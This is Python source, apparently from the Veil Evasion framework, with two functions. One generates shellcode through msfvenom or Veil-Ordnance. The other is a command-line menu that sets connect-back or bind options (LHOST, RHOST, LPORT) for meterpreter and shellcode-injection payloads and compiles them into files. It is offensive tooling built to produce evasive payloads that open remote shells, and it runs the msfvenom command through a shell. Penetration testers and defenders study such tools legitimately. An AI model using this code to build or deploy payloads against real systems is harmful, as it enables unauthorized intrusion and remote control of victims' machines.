def generate(self, required_options=None): """ Based on the options set by menu() or SetPayload() either returns the custom shellcode string or calls msfvenom and returns the result. Returns the shellcode string for this object. """ self.required_options = required_options # if the msfvenom command nor shellcode are set, revert to the # interactive menu to set any options if self.msfvenomCommand == '' and self.custom_shellcode == '': self.menu() # return custom specified shellcode if it was set previously if self.custom_shellcode != '': print(helpers.color("\n [*] Using pre-generated shellcode...")) return self.custom_shellcode elif self.invoke_ordnance: print( helpers.color( "\n [*] Generating shellcode using Veil-Ordnance...")) ordnance_loop = True Ordnance_object = ordnance_import.Tools() while ordnance_loop: Ordnance_object.tool_main_menu(invoked=True) if Ordnance_object.final_shellcode != '': self.payload_choice = Ordnance_object.selected_payload self.shellcode_options = Ordnance_object.payload_options ordnance_loop = False return Ordnance_object.final_shellcode # generate the shellcode using msfvenom else: print( helpers.color("\n [*] Generating shellcode using msfvenom...")) if self.msfvenomCommand == '': print( helpers.color( " [!] ERROR: msfvenom command not specified in payload!\n", warning=True)) return None else: # Strip out extra characters, new lines, etc., just leave the shellcode. # Tim Medin's patch for non-root non-Kali users msfvenom_shellcode = subprocess.check_output( settings.MSFVENOM_PATH + self.msfvenomCommand, shell=True) self.shellcode_options = self.msfvenomCommand msfvenom_shellcode = msfvenom_shellcode.decode('ascii') self.msfvenomCommand = "" return msfvenom_shellcode[22:-1].strip()
def cli_menu(self, invoked=False): # --list-payloads if self.command_options.list_payloads: self.list_loaded_payloads() sys.exit() # Check if a payload is provided, and if so, start the generation # process # Missing -p ? if not self.command_options.p: print(helpers.color(" [!] ERROR: Missing --payload selection (-p <payload>). Try: -t Evasion --list-payloads", warning=True)) else: user_cli_payload = self.return_payload_object(self.command_options.p) if not user_cli_payload: print(helpers.color(" [!] ERROR: You did not provide a valid payload selection!", warning=True)) print(helpers.color(" [*] Ex: info 2 OR info lua/shellcode_inject/flat.py", warning=True)) sys.exit() if self.command_options.ip is None and ("meterpreter" in user_cli_payload.path or "shellcode_inject" in user_cli_payload.path): print(helpers.color(" [!] ERROR: You did not provide an IP/domain to connect to/bind on", warning=True)) sys.exit() # Make sure IP is valid # --ip if self.command_options.ip is not None: valid_ip = helpers.validate_ip(self.command_options.ip) valid_hostname = helpers.validate_hostname(self.command_options.ip) if not valid_ip and not valid_hostname: print(helpers.color(" [!] ERROR: You did not provide a valid ip/domain!", warning=True)) print(helpers.color("[*] Please specify the correct value", warning=True)) sys.exit() # Determine if using Ordnance or MSFVenom for shellcode generation if self.command_options.ordnance_payload is None and self.command_options.msfvenom is None and "meterpreter" not in user_cli_payload.path: print(helpers.color(" [!] ERROR: You did not provide a shellcode option to use!", warning=True)) sys.exit() # Check if using a pure payload (shellcodeless) if "meterpreter" in user_cli_payload.path or "shellcode_inject" in user_cli_payload.path: if "meterpreter" in user_cli_payload.path: # Check for where the IP is being stored if "LHOST" in user_cli_payload.required_options: user_cli_payload.required_options["LHOST"][0] = self.command_options.ip elif "RHOST" in user_cli_payload.required_options: user_cli_payload.required_options["RHOST"][0] = self.command_options.ip # Store the LPORT value in the payload if "LPORT" in user_cli_payload.required_options: user_cli_payload.required_options["LPORT"][0] = self.command_options.port else: # If ordnance, generate shellcode through it if self.command_options.ordnance_payload is not None: Ordnance_object = ordnance_import.Tools(self.command_options) Ordnance_object.cli_menu(invoked=True) cli_shellcode = Ordnance_object.final_shellcode # Or if msfvenom, get that code elif self.command_options.msfvenom is not None: cli_shellcode = shellcode_help.cli_msf_shellcode_gen(self.command_options) # This could be the future area for adding custom shellcode. If there # is a need I can add it in # Set the shellcode in the Evasion payload user_cli_payload.cli_shellcode = cli_shellcode # Loop over setting required options # -c if self.command_options.c is not None: for payload_option in self.command_options.c: if payload_option != '': if "=" not in payload_option: print(helpers.color(" [!] Payload option not entered in correct syntax.\n", warning=True)) sys.exit() else: key = payload_option.split('=')[0].upper() value = payload_option.split('=')[1] if key in user_cli_payload.required_options: user_cli_payload.required_options[key][0] = value else: print(helpers.color(" [!] The option " + key + " does not exist for the selected payload!.\n", warning=True)) sys.exit() # Generate the payload code # source code stored in user_cli_payload.source_code user_cli_payload.generate() # figure out how to compile the code outfile.compiler(user_cli_payload, invoked=True, cli_object=self.command_options) return